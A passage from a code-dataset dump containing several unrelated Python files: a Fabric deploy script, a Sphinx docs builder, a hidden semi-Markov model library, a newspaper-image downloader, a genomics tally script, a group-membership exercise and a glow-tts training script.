scrapy_cfg_path,\n 'default = sales_rank_spider.settings',\n setting_location\n )\n\n def update_virtualenv(self):\n if not exists('%s/bin/pip' % (self.virtualenv_folder)):\n run('mkvirtualenv %s' % (self.PROJECT_NAME))\n\n with prefix('workon %s' % (self.PROJECT_NAME)):\n run('pip install -r %s/requirements.txt' % (self.source_folder))\n","sub_path":"fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":3877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"68222501","text":"#!/usr/bin/env python3\n\nimport argparse\nimport os\nfrom tempfile import TemporaryDirectory\n\nimport 
skeletonization\nimport skeletonization.doc_utils as docs\n\nROOT_SKELETONIZATION_DIR = os.path.dirname(os.path.dirname(skeletonization.__file__))\n\n\"\"\"Generate Sphinx documentation for the skeletonization module\"\"\"\nDOCS_FOLDER = os.path.join(ROOT_SKELETONIZATION_DIR, \"docs\")\nDOC_WARNING_RATCHET = 200\n\n\ndef main():\n \"\"\"\n Generate Sphinx docs for the skeletonization module.\n \"\"\"\n\n parser = argparse.ArgumentParser(\n description=\"Generate sphinx documentation\")\n parser.add_argument(\n \"--output_folder\",\n help=\"\"\"The folder to output the html documentation tree into.\n If unspecified the docs will be only be generated to check\n for errors/warnings.\"\"\",\n type=str)\n\n docs.build_api_docs(\n os.path.join(ROOT_SKELETONIZATION_DIR, \"\"),\n os.path.join(DOCS_FOLDER, \"api_python\"))\n\n args = parser.parse_args()\n\n with TemporaryDirectory() as td:\n output = args.output_folder if (args.output_folder is not None) else td\n warning_count = docs.build_html_docs(DOCS_FOLDER, output)\n\n print(\"Documentation written to: {}\", output)\n few_enough_warnings = warning_count <= DOC_WARNING_RATCHET\n print(\n \"Documentation Build Test: {} ({}/{})\",\n \"PASSED\" if few_enough_warnings else \"FAILED\",\n warning_count,\n DOC_WARNING_RATCHET)\n\n return 0 if few_enough_warnings else 1\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"run_sphinx_documentation.py","file_name":"run_sphinx_documentation.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"171831784","text":"import numpy as np\nfrom scipy.stats import multivariate_normal\nfrom scipy.special import logsumexp\nfrom sklearn import cluster\nfrom sklearn.utils import check_array, check_random_state\n\nfrom . 
import hsmm_core_x as core, hsmm_utils\nfrom .hsmm_utils import log_mask_zero, iter_from_X_lengths\n\n# Base Class for Explicit Duration HSMM\nclass HSMM:\n def __init__(self, n_states=2, n_durations=5, n_iter=20, tol=1e-2, rnd_state=None):\n if not n_states >= 2:\n raise ValueError(\"number of states (n_states) must be at least 2\")\n if not n_durations >= 1:\n raise ValueError(\"number of durations (n_durations) must be at least 1\")\n self.n_states = n_states\n self.n_durations = n_durations\n self.n_iter = n_iter\n self.tol = tol\n self.rnd_state = rnd_state\n\n # _init: initializes model parameters if there are none yet\n def _init(self):\n if not hasattr(self, \"pi\"):\n self.pi = np.full(self.n_states, 1.0 / self.n_states)\n if not hasattr(self, \"tmat\"):\n self.tmat = np.full((self.n_states, self.n_states), 1.0 / (self.n_states - 1))\n for i in range(self.n_states):\n self.tmat[i, i] = 0.0 # no self-transitions in EDHSMM\n self._dur_init() # duration\n\n # _check: check if properties of model parameters are satisfied\n def _check(self):\n # starting probabilities\n self.pi = np.asarray(self.pi)\n if self.pi.shape != (self.n_states, ):\n raise ValueError(\"start probabilities (self.pi) must have shape ({},)\".format(self.n_states))\n if not np.allclose(self.pi.sum(), 1.0):\n raise ValueError(\"start probabilities (self.pi) must add up to 1.0\")\n # transition probabilities\n self.tmat = np.asarray(self.tmat)\n if self.tmat.shape != (self.n_states, self.n_states):\n raise ValueError(\"transition matrix (self.tmat) must have shape ({0}, {0})\".format(self.n_states))\n if not np.allclose(self.tmat.sum(axis=1), 1.0):\n raise ValueError(\"transition matrix (self.tmat) must add up to 1.0\")\n for i in range(self.n_states):\n if self.tmat[i, i] != 0.0: # check for diagonals\n raise ValueError(\"transition matrix (self.tmat) must have all diagonals equal to 0.0\")\n # duration probabilities\n self._dur_check()\n\n # _dur_init: initializes duration parameters if there are none yet\n def _dur_init(self):\n \"\"\"\n arguments: (self)\n return: None\n > initialize the duration parameters\n \"\"\"\n pass # implemented in subclass\n \n # _dur_check: checks if properties of duration parameters are satisfied\n def _dur_check(self):\n \"\"\"\n arguments: (self)\n return: None\n > check the duration parameters\n \"\"\"\n pass # implemented in subclass\n \n # _dur_probmat: compute the probability per state of each duration\n def _dur_probmat(self):\n \"\"\"\n arguments: (self)\n return: duration probability matrix\n \"\"\"\n pass # implemented in subclass\n\n # _dur_mstep: perform m-step for duration parameters\n def _dur_mstep(self):\n \"\"\"\n arguments: (self, new_dur)\n return: None\n > compute the duration parameters\n \"\"\"\n pass # implemented in subclass\n\n # _emission_logprob: compute the log-likelihood per state of each observation\n def _emission_logprob(self):\n \"\"\"\n arguments: (self, X)\n return: logframe\n \"\"\"\n pass # implemented in subclass\n\n # _emission_pre_mstep: prepare m-step for emission parameters\n def _emission_pre_mstep(self):\n \"\"\"\n arguments: (self, gamma, emission_var)\n return: None\n > process gamma and save output to emission_var\n \"\"\"\n pass # implemented in subclass\n\n # _emission_mstep: perform m-step for emission parameters\n def _emission_mstep(self):\n \"\"\"\n arguments: (self, X, emission_var)\n return: None\n > compute the emission parameters\n \"\"\"\n pass # implemented in subclass\n\n # _state_sample: generate 'observation' for given 
state\n def _state_sample(self):\n \"\"\"\n arguments: (self, state, rnd_state=None)\n return: np.ndarray of length equal to dimension of observation\n > generate sample from state\n \"\"\"\n pass # implemented in subclass\n\n # sample: generate random observation series\n def sample(self, n_samples=5, censoring=1, rnd_state=None):\n # self._init(None) # see \"note for programmers\" in init() in GaussianHSMM\n self._check()\n # setup random state\n if rnd_state is None:\n rnd_state = self.rnd_state\n rnd_checked = check_random_state(rnd_state)\n # adapted from hmmlearn 0.2.3 (see _BaseHMM.score function)\n pi_cdf = np.cumsum(self.pi)\n tmat_cdf = np.cumsum(self.tmat, axis=1)\n dur_cdf = np.cumsum(self._dur_probmat(), axis=1)\n # for first state\n currstate = (pi_cdf > rnd_checked.rand()).argmax() # argmax() returns only the first occurrence\n currdur = (dur_cdf[currstate] > rnd_checked.rand()).argmax() + 1\n if censoring == 0 and currdur > n_samples:\n print(\"SAMPLE: n_samples is too small to contain the first state duration.\")\n return None\n state_sequence = [currstate] * currdur\n X = [self._state_sample(currstate, rnd_checked) for i in range(currdur)] # generate 'observation'\n ctr_sample = currdur\n # for next state transitions\n while ctr_sample < n_samples:\n currstate = (tmat_cdf[currstate] > rnd_checked.rand()).argmax()\n currdur = (dur_cdf[currstate] > rnd_checked.rand()).argmax() + 1\n # test if now in the end of generating samples\n if ctr_sample + currdur > n_samples:\n if censoring == 0:\n break # if without right censoring, do not include exceeding state duration\n else:\n currdur = n_samples - ctr_sample # if with right censoring, cap the samples to n_samples\n state_sequence += [currstate] * currdur\n X += [self._state_sample(currstate, rnd_checked) for i in range(currdur)] # generate 'observation'\n ctr_sample += currdur\n return ctr_sample, np.atleast_2d(X), np.array(state_sequence, dtype=int)\n\n # _core_u_only: container for core._u_only (for multiple observation sequences)\n def _core_u_only(self, logframe):\n n_samples = logframe.shape[0]\n u = np.empty((n_samples, self.n_states, self.n_durations))\n core._u_only(n_samples, self.n_states, self.n_durations,\n logframe, u)\n return u\n\n # _core_forward: container for core._forward (for multiple observation sequences)\n def _core_forward(self, u, logdur, censoring):\n n_samples = u.shape[0]\n if censoring == 0: # without right censoring\n eta = np.empty((n_samples, self.n_states, self.n_durations))\n else: # with right censoring\n eta = np.empty((n_samples + self.n_durations - 1, self.n_states, self.n_durations))\n xi = np.empty((n_samples, self.n_states, self.n_states))\n core._forward(n_samples, self.n_states, self.n_durations,\n log_mask_zero(self.pi),\n log_mask_zero(self.tmat),\n logdur, censoring, eta, u, xi)\n return eta, xi\n\n # _core_backward: container for core._backward (for multiple observation sequences)\n def _core_backward(self, u, logdur, censoring):\n n_samples = u.shape[0]\n beta = np.empty((n_samples, self.n_states))\n betastar = np.empty((n_samples, self.n_states))\n core._backward(n_samples, self.n_states, self.n_durations,\n log_mask_zero(self.pi),\n log_mask_zero(self.tmat),\n logdur, censoring, beta, u, betastar)\n return beta, betastar\n \n # _core_smoothed: container for core._smoothed (for multiple observation sequences)\n def _core_smoothed(self, beta, betastar, censoring, eta, xi):\n n_samples = beta.shape[0]\n gamma = np.empty((n_samples, self.n_states))\n core._smoothed(n_samples, 
self.n_states, self.n_durations,\n beta, betastar, censoring, eta, xi, gamma)\n return gamma\n \n # _core_viterbi: container for core._viterbi (for multiple observation sequences)\n def _core_viterbi(self, u, logdur, censoring):\n n_samples = u.shape[0]\n state_sequence, log_prob = core._viterbi(n_samples, self.n_states, self.n_durations,\n log_mask_zero(self.pi),\n log_mask_zero(self.tmat),\n logdur, censoring, u)\n return state_sequence, log_prob\n\n # score: log-likelihood computation from observation series\n def score(self, X, lengths=None, censoring=1):\n X = check_array(X)\n # self._init(X)\n self._check()\n logdur = log_mask_zero(self._dur_probmat()) # build logdur\n # main computations\n log_prob = 0\n for i, j in iter_from_X_lengths(X, lengths):\n logframe = self._emission_logprob(X[i:j]) # build logframe\n u = self._core_u_only(logframe)\n _, betastar = self._core_backward(u, logdur, censoring)\n gammazero = log_mask_zero(self.pi) + betastar[0]\n log_prob += logsumexp(gammazero)\n return log_prob\n\n # predict: hidden state & duration estimation from observation series\n def predict(self, X, lengths=None, censoring=1):\n X = check_array(X)\n # self._init(X)\n self._check()\n logdur = log_mask_zero(self._dur_probmat()) # build logdur\n # main computations\n log_prob = 0\n state_sequence = np.empty(X.shape[0], dtype=int) # total n_samples = X.shape[0]\n for i, j in iter_from_X_lengths(X, lengths):\n logframe = self._emission_logprob(X[i:j]) # build logframe\n u = self._core_u_only(logframe)\n iter_state_sequence, iter_log_prob = self._core_viterbi(u, logdur, censoring)\n log_prob += iter_log_prob\n state_sequence[i:j] = iter_state_sequence\n return state_sequence, log_prob\n\n # fit: parameter estimation from observation series\n def fit(self, X, lengths=None, censoring=1):\n X = check_array(X)\n self._init(X)\n self._check()\n # main computations\n for itera in range(self.n_iter):\n score = 0\n pi_num = np.full(self.n_states, -np.inf)\n tmat_num = dur_num = -np.inf\n emission_var = [None] # see \"note for programmers\" in _emission_pre_mstep() in GaussianHSMM\n logdur = log_mask_zero(self._dur_probmat()) # build logdur\n for i, j in iter_from_X_lengths(X, lengths):\n logframe = self._emission_logprob(X[i:j]) # build logframe\n u = self._core_u_only(logframe)\n eta, xi = self._core_forward(u, logdur, censoring)\n beta, betastar = self._core_backward(u, logdur, censoring)\n gamma = self._core_smoothed(beta, betastar, censoring, eta, xi)\n score += logsumexp(gamma[0, :]) # this is the output of 'score' function\n # preparation for reestimation / M-step\n # this will make fit() slower than the previous version :(\n xi = np.resize(xi, (j - i + 1, self.n_states, self.n_states))\n eta = np.resize(eta, (j - i + 1, self.n_states, self.n_durations))\n xi[j - i] = tmat_num\n eta[j - i] = dur_num\n pi_num = logsumexp([pi_num, gamma[0]], axis=0)\n tmat_num = logsumexp(xi, axis=0)\n dur_num = logsumexp(eta, axis=0)\n self._emission_pre_mstep(gamma, emission_var)\n # check for loop break\n if itera > 0 and (score - old_score) < self.tol:\n print(\"FIT: converged at {}th loop.\".format(itera + 1))\n break\n else:\n old_score = score\n # reestimation / M-step\n self.pi = np.exp(pi_num - logsumexp(pi_num))\n self.tmat = np.exp(tmat_num - logsumexp(tmat_num, axis=1)[None].T)\n new_dur = np.exp(dur_num - logsumexp(dur_num, axis=1)[None].T)\n self._dur_mstep(new_dur) # new durations\n self._emission_mstep(X, emission_var[0]) # new emissions\n print(\"FIT: reestimation complete for {}th 
loop.\".format(itera + 1))\n\n# Sample Subclass: Explicit Duration HSMM with Gaussian Emissions\nclass GaussianHSMM(HSMM):\n def __init__(self, n_states=2, n_durations=5, n_iter=20, tol=1e-2, rnd_state=None):\n super().__init__(n_states, n_durations, n_iter, tol, rnd_state)\n\n def _init(self, X):\n super()._init()\n # note for programmers: for every attribute that needs X in score()/predict()/fit(),\n # there must be a condition 'if X is None' because sample() doesn't need an X, but\n # default attribute values must be initiated for sample() to proceed.\n if True: # always change self.n_dim\n if X is None: # default for sample()\n self.n_dim = 1\n else:\n self.n_dim = X.shape[1]\n if not hasattr(self, \"mean\"):\n if X is None: # default for sample()\n # self.mean = [[0.], [1.], [2.], ...]\n self.mean = np.arange(0., self.n_states)[:, None]\n else:\n kmeans = cluster.KMeans(n_clusters=self.n_states, random_state=self.rnd_state)\n kmeans.fit(X)\n self.mean = kmeans.cluster_centers_\n if not hasattr(self, \"covmat\"):\n if X is None: # default for sample()\n self.covmat = np.repeat(np.identity(self.n_dim)[None], self.n_states, axis=0)\n else:\n # TODO: initial covariance matrices must be computed from X\n self.covmat = np.repeat(np.identity(self.n_dim)[None], self.n_states, axis=0)\n\n def _check(self):\n super()._check()\n # means\n self.mean = np.asarray(self.mean)\n if self.mean.shape != (self.n_states, self.n_dim):\n raise ValueError(\"means (self.mean) must have shape ({}, {})\"\n .format(self.n_states, self.n_dim))\n # covariance matrices\n self.covmat = np.asarray(self.covmat)\n if self.covmat.shape != (self.n_states, self.n_dim, self.n_dim):\n raise ValueError(\"covariance matrices (self.covmat) must have shape ({0}, {1}, {1})\"\n .format(self.n_states, self.n_dim))\n\n def _dur_init(self):\n # non-parametric duration\n if not hasattr(self, \"dur\"):\n self.dur = np.full((self.n_states, self.n_durations), 1.0 / self.n_durations)\n\n def _dur_check(self):\n self.dur = np.asarray(self.dur)\n if self.dur.shape != (self.n_states, self.n_durations):\n raise ValueError(\"duration probabilities (self.dur) must have shape ({}, {})\"\n .format(self.n_states, self.n_durations))\n if not np.allclose(self.dur.sum(axis=1), 1.0):\n raise ValueError(\"duration probabilities (self.dur) must add up to 1.0\")\n\n def _dur_probmat(self):\n # non-parametric duration\n return self.dur\n\n def _dur_mstep(self, new_dur):\n # non-parametric duration\n self.dur = new_dur\n \n def _emission_logprob(self, X):\n # abort EM loop if any covariance matrix is not symmetric, positive-definite.\n # adapted from hmmlearn 0.2.3 (see _utils._validate_covars function)\n for n, cv in enumerate(self.covmat):\n if (not np.allclose(cv, cv.T) or np.any(np.linalg.eigvalsh(cv) <= 0)):\n raise ValueError(\"component {} of covariance matrix is not symmetric, positive-definite.\"\n .format(n))\n # https://www.youtube.com/watch?v=tWoFaPwbzqE&t=1694s\n n_samples = X.shape[0]\n logframe = np.empty((n_samples, self.n_states))\n for i in range(self.n_states):\n multigauss = multivariate_normal(self.mean[i], self.covmat[i])\n for j in range(n_samples):\n logframe[j, i] = log_mask_zero(multigauss.pdf(X[j]))\n return logframe\n \n def _emission_pre_mstep(self, gamma, emission_var):\n # note for programmers: refer to \"emission_var\" as emission_var[0] here. 
Maybe this\n # is unidiomatic, but this is done to force pass-by-reference to the np.ndarray.\n # note #2: The \"emssion_var\" here is the cumulative concatenation of the gammas of each\n # observation sequence, so most likely you wouldn't modify this for your own subclass.\n if emission_var[0] is None: # initial\n emission_var[0] = gamma\n else:\n old_emitlength = emission_var[0].shape[0]\n emission_var[0] = np.resize(emission_var[0], (old_emitlength + gamma.shape[0], self.n_states))\n emission_var[0][old_emitlength:] = gamma\n\n def _emission_mstep(self, X, emission_var):\n # note for programmers: now refer to \"emission_var\" as it is, here.\n denominator = logsumexp(emission_var, axis=0)\n weight_normalized = np.exp(emission_var - denominator)[None].T\n # compute means (from definition; weighted)\n self.mean = (weight_normalized * X).sum(1)\n # compute covariance matrices (from definition; weighted)\n dist = X - self.mean[:, None]\n self.covmat = ((dist * weight_normalized)[:, :, :, None] * dist[:, :, None]).sum(1)\n \n def _state_sample(self, state, rnd_state=None):\n rnd_checked = check_random_state(rnd_state)\n return rnd_checked.multivariate_normal(self.mean[state], self.covmat[state])\n","sub_path":"edhsmm/hsmm_base.py","file_name":"hsmm_base.py","file_ext":"py","file_size_in_byte":18163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"533811630","text":"import requests\nimport shutil\nfrom datetime import datetime\n\ntoday = datetime.now()\ndt = today.strftime(\"%d%m%Y\")\nimg_pre = (\n \"https://epaper.anandabazar.com/epaperimages////\" + dt + \"////\" + dt + \"-md-hr-\"\n)\nimg_post = \"ll.png\"\n\ni = 1\nimage_url = img_pre + str(i) + img_post\nr = requests.get(image_url, stream=True)\nwhile r.status_code == 200:\n r.raw.decode_content = True\n filename = dt + \"_\" + str(i) + \".png\"\n with open(filename, \"wb\") as f:\n shutil.copyfileobj(r.raw, f)\n i += 1\n image_url = img_pre + str(i) + img_post\n r = requests.get(image_url, stream=True, allow_redirects=False)\n","sub_path":"download_epaper.py","file_name":"download_epaper.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"481460465","text":"\nimport os\nfrom Functions import *\n\nrepD={}\nfor i in read_file('bed/BedIntersect.TadCs.Repeats.bed'):\n\ti=i.split('\\t')\n\tcC=i[3]\n\tcPos=int(i[3].split('.')[1])\n\tif int(i[7])<=cPos and cPos<=int(i[8]):\n\t\ttry:\n\t\t\t#repD[cC]+=[i[9].split('|')[0]]\n\t\t\trepD[i[9].split('|')[0]]+=[cC]\n\t\texcept KeyError:\n\t\t\trepD[i[9].split('|')[0]]=[cC]\n\t\t\t#repD[cC]=[i[9].split('|')[0]]\n\ncorD={}\nfor i in read_file('output/Correlation/Step2/TadCorrelations.txt')[1:]:\n\ti=i.split('\\t')\n\tcC=i[0].replace('.NA0','')\n\ttry:\n\t\tcorD[i[7]]+=[cC]\n\texcept KeyError:\n\t\tcorD[i[7]]=[cC]\ncKeys=sorted(corD.keys())\n\nallCs=[x.split('\\t')[3] for x in read_file('bed/ForTadCEvol.bed')]\nrepCs=[item for sublist in repD.values() for item in sublist]\ncorCs=[item for sublist in corD.values() for item in sublist]\n\ns='Background\\t'+'\\t'.join(cKeys)+'\\n'\n\ns+='NoRep\\t%s' % (len(list(set(allCs).difference(set(repCs)))))\nfor j in cKeys:\n\ts+='\\t%s' % (len(list(set(corD[j]).difference(set(repCs)))))\ns+='\\n'\n\ns+='InReps\\t%s' % (len(list(set(allCs).intersection(set(repCs)))))\nfor j in cKeys:\n\ts+='\\t%s' % (len(list(set(corD[j]).intersection(set(repCs)))))\ns+='\\n'\n\nfor i in sorted(repD.keys()):\n\ts+='%s\\t%s' % 
(i,len(repD[i]))\n\tfor j in cKeys:\n\t\ts+='\\t%s' % (len(list(set(repD[i]).intersection(set(corD[j])))))\n\ts+='\\n'\nwrite_file('output/TAD.C_in_Repeats.txt',s)\n\n\n\n\n\n","sub_path":"Step035.mCs.py","file_name":"Step035.mCs.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"609041280","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 14 05:54:21 2019\n\n@author: nitinkotcherlakota\n\"\"\"\n\n#Active Directory\nclass Group(object):\n def __init__(self, _name):\n self.name = _name\n self.groups = []\n self.users = []\n\n def add_group(self, group):\n self.groups.append(group)\n\n def add_user(self, user):\n self.users.append(user)\n\n def get_groups(self):\n return self.groups\n\n def get_users(self):\n return self.users\n\n def get_name(self):\n return self.name\n \n\nparent = Group(\"parent\")\nchild = Group(\"child\")\nsub_child = Group(\"subchild\")\n\n\nsub_child_user = \"sub_child_user\"\nsub_child.add_user(sub_child_user)\n\nchild.add_group(sub_child)\nparent.add_group(child)\n\nchild.add_user(\"child_user\")\nchild.add_user(\"child_user1\")\nchild.add_user(\"child_user2\")\n\ndef is_user_in_group(user, group):\n if isinstance(group, str):\n group = eval(group)\n if user == group.get_name():\n return True\n if user in group.get_users():\n return True\n for grp in group.get_groups():\n return is_user_in_group(user,grp)\nprint(\"Is child in Parent group? \",is_user_in_group(\"child\",parent)) #True\nprint(\"Is Sub child user in parent group? \",is_user_in_group(\"sub_child_user\",parent)) #True\nprint(\"Is parent in child group? \",is_user_in_group(\"parent\",child)) #None\nprint(\"Entering blank data:\", is_user_in_group(\"\",parent)) #None","sub_path":"ActiveDirectory.py","file_name":"ActiveDirectory.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"276379717","text":"import os\nimport json\nimport argparse\nimport math\nimport numpy as np\nimport copy\nimport torch\nfrom torch import nn, optim\nfrom torch.nn import functional as F\nfrom torch.utils.data import DataLoader\nfrom torch.utils.tensorboard import SummaryWriter\nimport torch.multiprocessing as mp\nimport torch.distributed as dist\nimport matplotlib.pyplot as plt\n\nfrom apex.parallel import DistributedDataParallel as DDP\nfrom apex import amp\n\nfrom data_utils import TextMelLoader, TextMelCollate\nimport models\nimport commons\nimport utils\nfrom text.symbols import symbols\n \n\nglobal_step = 0\n\n\ndef main():\n \"\"\"Assume Single Node Multi GPUs Training Only\"\"\"\n assert torch.cuda.is_available(), \"CPU training is not allowed.\"\n torch.cuda.empty_cache()\n\n n_gpus = torch.cuda.device_count()\n os.environ['MASTER_ADDR'] = 'localhost'\n os.environ['MASTER_PORT'] = '80001'\n\n hps = utils.get_hparams()\n mp.spawn(train_and_eval, nprocs=n_gpus, args=(n_gpus, hps,))\n\n\ndef train_and_eval(rank, n_gpus, hps):\n global global_step\n \n ## Added as part of MSc Thesis - Transformer optimization\n global global_omega\n global prev_l_head_wt\n global prev_l_qry_wt\n \n if rank == 0:\n logger = utils.get_logger(hps.model_dir)\n logger.info(hps)\n utils.check_git_hash(hps.model_dir)\n writer = SummaryWriter(log_dir=hps.model_dir)\n writer_eval = SummaryWriter(log_dir=os.path.join(hps.model_dir, \"eval\"))\n\n dist.init_process_group(backend='nccl', init_method='env://', world_size=n_gpus, 
rank=rank)\n torch.manual_seed(hps.train.seed)\n torch.cuda.set_device(rank)\n\n train_dataset = TextMelLoader(hps.data.training_files, hps.data)\n train_sampler = torch.utils.data.distributed.DistributedSampler(\n train_dataset,\n num_replicas=n_gpus,\n rank=rank,\n shuffle=True)\n collate_fn = TextMelCollate(1)\n train_loader = DataLoader(train_dataset, num_workers=8, shuffle=False,\n batch_size=hps.train.batch_size, pin_memory=True,\n drop_last=True, collate_fn=collate_fn, sampler=train_sampler)\n if rank == 0:\n val_dataset = TextMelLoader(hps.data.validation_files, hps.data)\n val_loader = DataLoader(val_dataset, num_workers=8, shuffle=False,\n batch_size=hps.train.batch_size, pin_memory=True,\n drop_last=True, collate_fn=collate_fn)\n\n generator = models.FlowGenerator(\n n_vocab=len(symbols) + getattr(hps.data, \"add_blank\", False), \n out_channels=hps.data.n_mel_channels, \n **hps.model).cuda(rank)\n if hps.model.mask_flag == 'Y':\n dim_m = (hps.model.hidden_channels / hps.model.n_heads) * (hps.model.n_heads - len(hps.model.mask_heads))\n else:\n dim_m = hps.model.hidden_channels\n #print(dim_m)\n optimizer_g = commons.Adam(generator.parameters(), scheduler=hps.train.scheduler, dim_model=dim_m, warmup_steps=hps.train.warmup_steps, lr=hps.train.learning_rate, betas=hps.train.betas, eps=hps.train.eps)\n if hps.train.fp16_run:\n generator, optimizer_g._optim = amp.initialize(generator, optimizer_g._optim, opt_level=\"O1\")\n generator = DDP(generator)\n epoch_str = 1\n global_step = 0\n \n ## Added as part of MSc Thesis - Transformer optimization\n global_omega = np.zeros((4, 8), dtype=float)\n prev_l_head_wt = np.zeros((4, 8), dtype=float)\n prev_l_qry_wt = np.zeros((4, 8), dtype=float)\n \n \n try:\n _, _, _, epoch_str = utils.load_checkpoint(utils.latest_checkpoint_path(hps.model_dir, \"G_*.pth\"), generator, optimizer_g)\n epoch_str += 1\n optimizer_g.step_num = (epoch_str - 1) * len(train_loader)\n optimizer_g._update_learning_rate()\n global_step = (epoch_str - 1) * len(train_loader)\n global_omega = 0\n\n except:\n if hps.train.ddi and os.path.isfile(os.path.join(hps.model_dir, \"ddi_G.pth\")):\n _ = utils.load_checkpoint(os.path.join(hps.model_dir, \"ddi_G.pth\"), generator, optimizer_g)\n loss_train = []\n loss_val = []\n \n best_epoch = 1\n loss_diff = 0.0\n cnt = 0\n\n for epoch in range(epoch_str, hps.train.epochs + 1):\n if rank==0:\n train(rank, epoch, hps, generator, optimizer_g, train_loader, logger, writer,loss_train)\n evaluate(rank, epoch, hps, generator, optimizer_g, val_loader, logger, writer_eval,loss_val)\n \n\n utils.save_checkpoint(generator, optimizer_g, hps.train.learning_rate, epoch, os.path.join(hps.model_dir, \"G_{}.pth\".format(epoch)))\n else:\n train(rank, epoch, hps, generator, optimizer_g, train_loader, None, None)\n \n ## Added as part of MSc Thesis - Transformer optimization\n print(\"Loss: \",loss_train)\n print(\"Loss Val: \",loss_val) \n# loss_diff = abs(loss_val[epoch-1].item() - loss_train[epoch-1].item())\n# # print(\"loss_diff: \",loss_diff)\n# if loss_diff > 0.1:\n# best_epoch = epoch - 1\n# cnt += 1\n# print(\"cnt: \",cnt)\n# else:\n# cnt = 0\n# best_epoch = epoch - 1\n# if cnt > 5:\n# break\n# print(\"loss: \",loss_val)\n# print(\"Best Epoch: \",best_epoch)\n \n fig = plt.figure()\n plt.title(\"Loss vs. 
Number of Training Epochs\")\n plt.xlabel(\"Epochs\")\n plt.ylabel(\"Loss\")\n plt.plot(range(1,hps.train.epochs + 1),loss_train,label='Train')\n plt.plot(range(1,hps.train.epochs + 1),loss_val,label='Validation')\n# plt.plot(range(1,best_epoch + 2),loss_train,label='Train')\n# plt.plot(range(1,best_epoch + 2),loss_val,label='Validation')\n plt.legend()\n fignm=\"/content/gdrive/MyDrive/Colab Notebooks/Project/glow-tts/logs/fig_\"+str(epoch)+\".png\"\n fig.savefig(fignm)\n print(\"global_omega: \",global_omega)\n print(\"global_omega_idx_sort: \", np.argsort(global_omega))\n arr1 = np.array(global_omega).flatten()\n print(arr1.argsort())\n\ndef train(rank, epoch, hps, generator, optimizer_g, train_loader, logger, writer,loss_train):\n train_loader.sampler.set_epoch(epoch)\n global global_step\n \n ## Added as part of MSc Thesis - Transformer optimization\n global global_omega\n global prev_l_head_wt\n global prev_l_qry_wt\n losses_tot1 = []\n omega = global_omega\n grad = np.zeros((4, 8), dtype=float)\n \n generator.train()\n for batch_idx, (x, x_lengths, y, y_lengths) in enumerate(train_loader):\n x, x_lengths = x.cuda(rank, non_blocking=True), x_lengths.cuda(rank, non_blocking=True)\n y, y_lengths = y.cuda(rank, non_blocking=True), y_lengths.cuda(rank, non_blocking=True)\n\n\n # Train Generator\n optimizer_g.zero_grad()\n \n (z, z_m, z_logs, logdet, z_mask), (x_m, x_logs, x_mask, l_head_wt, l_qry_wt, l_attn_wt), (attn, logw, logw_) = generator(x, x_lengths, y, y_lengths, gen=False)\n l_mle = commons.mle_loss(z, z_m, z_logs, logdet, z_mask)\n l_length = commons.duration_loss(logw, logw_, x_lengths)\n\n loss_gs = [l_mle, l_length]\n loss_g = sum(loss_gs)\n #print(\"prev_l_qry_wt: \",prev_l_qry_wt)\n if batch_idx == 0:\n losses_tot1 = loss_gs\n else:\n losses_tot1 = [x + y for (x, y) in zip(losses_tot1, loss_gs)]\n \n\n ## Added as part of MSc Thesis - Transformer optimization \n diff_qry = np.abs(l_qry_wt - prev_l_qry_wt)\n #print(\"diff_qry: \",diff_qry)\n grad = (np.abs(l_head_wt - prev_l_head_wt)/ l_head_wt) * diff_qry \n current_size = (batch_idx+1)* hps.train.batch_size #batch_size - 8\n step_size = 1/float(current_size)\n \n #Incremental update for the omega\n omega = omega + step_size*grad \n\n if hps.train.fp16_run:\n with amp.scale_loss(loss_g, optimizer_g._optim) as scaled_loss:\n scaled_loss.backward()\n grad_norm = commons.clip_grad_value_(amp.master_params(optimizer_g._optim), 5)\n else:\n loss_g.backward()\n grad_norm = commons.clip_grad_value_(generator.parameters(), 5)\n optimizer_g.step()\n \n if rank==0:\n if batch_idx % hps.train.log_interval == 0:\n (y_gen, *_), *_ = generator.module(x[:1], x_lengths[:1], gen=True)\n logger.info('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(x), len(train_loader.dataset),\n 100. 
* batch_idx / len(train_loader),\n loss_gs[0].item()))\n logger.info([x.item() for x in loss_gs] + [global_step, optimizer_g.get_lr()])\n \n scalar_dict = {\"loss/g/total\": loss_g, \"learning_rate\": optimizer_g.get_lr(), \"grad_norm\": grad_norm}\n scalar_dict.update({\"loss/g/{}\".format(i): v for i, v in enumerate(loss_gs)})\n utils.summarize(\n writer=writer,\n global_step=global_step, \n images={\"y_org\": utils.plot_spectrogram_to_numpy(y[0].data.cpu().numpy()), \n \"y_gen\": utils.plot_spectrogram_to_numpy(y_gen[0].data.cpu().numpy()), \n \"attn\": utils.plot_alignment_to_numpy(attn[0,0].data.cpu().numpy()),\n },\n scalars=scalar_dict)\n global_step += 1\n \n ## Added as part of MSc Thesis - Transformer optimization\n prev_l_head_wt = copy.deepcopy(l_head_wt)\n prev_l_qry_wt = copy.deepcopy(l_qry_wt)\n #print(\"global_step: \",global_step)\n global_omega += (1/((hps.train.epochs + 1) - epoch))*omega\n \n losses_tot1 = [x/len(train_loader) for x in losses_tot1]\n #losses_tot1 = [x/2 for x in losses_tot1]\n #loss_tot1 = sum(losses_tot1)\n loss_tot1 = losses_tot1[0]\n loss_train.append(loss_tot1.detach())\n\n if rank == 0:\n logger.info('====> Epoch: {}'.format(epoch))\n\n \ndef evaluate(rank, epoch, hps, generator, optimizer_g, val_loader, logger, writer_eval,loss_val):\n if rank == 0:\n global 